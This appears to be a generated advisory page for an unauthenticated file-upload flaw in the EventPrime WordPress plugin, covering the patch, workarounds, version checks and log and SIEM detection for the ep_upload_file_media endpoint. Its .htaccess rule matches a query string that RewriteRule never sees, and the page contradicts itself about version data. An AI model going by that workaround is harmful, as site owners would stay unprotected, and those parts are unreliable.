CVE-2026-1657 – The EventPrime WordPress plugin allows unauthen... (How to Fix)

Q: What is the severity of CVE-2026-1657?

CVE-2026-1657 has a CVSS score of 5.3 (MEDIUM). The EventPrime WordPress plugin allows unauthenticated attackers to upload image files to the WordPress uploads directory and create Media Library attachments via a publicly accessible AJAX endpoint. This affects all WordPress sites using EventPrime plugin versions up to 4.2.8.4.

📋 TL;DR

The EventPrime WordPress plugin allows unauthenticated attackers to upload image files to the WordPress uploads directory and create Media Library attachments via a publicly accessible AJAX endpoint. This affects all WordPress sites using EventPrime plugin versions up to 4.2.8.4.

💻 Affected Systems

Products:

EventPrime WordPress Plugin

Versions: All versions up to and including 4.2.8.4

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: All WordPress installations with the vulnerable plugin version are affected regardless of configuration.

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.

Recommended Actions:

Review the CVE details at NVD
Check vendor security advisories for your specific version
Test if the vulnerability is exploitable in your environment
Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could upload malicious files disguised as images, potentially leading to remote code execution if file execution is possible, or use the uploads for phishing campaigns.

🟠

Likely Case

Attackers upload malicious images or use the uploads directory for hosting phishing content, defacement, or malware distribution.

🟢

If Mitigated

Unauthorized file uploads are blocked, preventing any malicious content from being hosted on the server.

🌐 Internet-Facing: HIGH

🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires only HTTP POST requests to the vulnerable endpoint without authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.2.8.5 or later

Vendor Advisory: https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L1659

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find EventPrime plugin and click 'Update Now'. 4. Verify the plugin version is 4.2.8.5 or higher.

🔧 Temporary Workarounds

Disable vulnerable AJAX endpoint via .htaccess

linux

Blocks access to the ep_upload_file_media endpoint at web server level

RewriteEngine On
RewriteRule ^wp-admin/admin-ajax\.php\?action=ep_upload_file_media - [F,L]

Temporarily disable EventPrime plugin

all

Completely removes the vulnerable functionality

wp plugin deactivate eventprime-event-calendar-management

🧯 If You Can't Patch

Implement web application firewall (WAF) rules to block requests to /wp-admin/admin-ajax.php with action=ep_upload_file_media
Restrict file uploads directory permissions and implement file type validation at server level

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > EventPrime version. If version is 4.2.8.4 or lower, the site is vulnerable.

Check Version:

wp plugin get eventprime-event-calendar-management --field=version

Verify Fix Applied:

After updating, verify the plugin version is 4.2.8.5 or higher and test that unauthenticated POST requests to /wp-admin/admin-ajax.php?action=ep_upload_file_media are rejected.

📡 Detection & Monitoring

Log Indicators:

Multiple POST requests to /wp-admin/admin-ajax.php with action=ep_upload_file_media from unauthenticated users
File uploads to wp-content/uploads/ from non-admin users

Network Indicators:

HTTP POST requests to /wp-admin/admin-ajax.php with action=ep_upload_file_media parameter
Unusual file upload traffic to WordPress uploads directory

SIEM Query:

source="web_server" AND (url_path="/wp-admin/admin-ajax.php" AND http_method="POST" AND url_query="*action=ep_upload_file_media*")

📊 Metadata

CVE ID: CVE-2026-1657

CVSS v3 Score: 5.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CWE: CWE-862

Published: February 17, 2026

Last Updated: February 18, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-1657, you might also want to check these: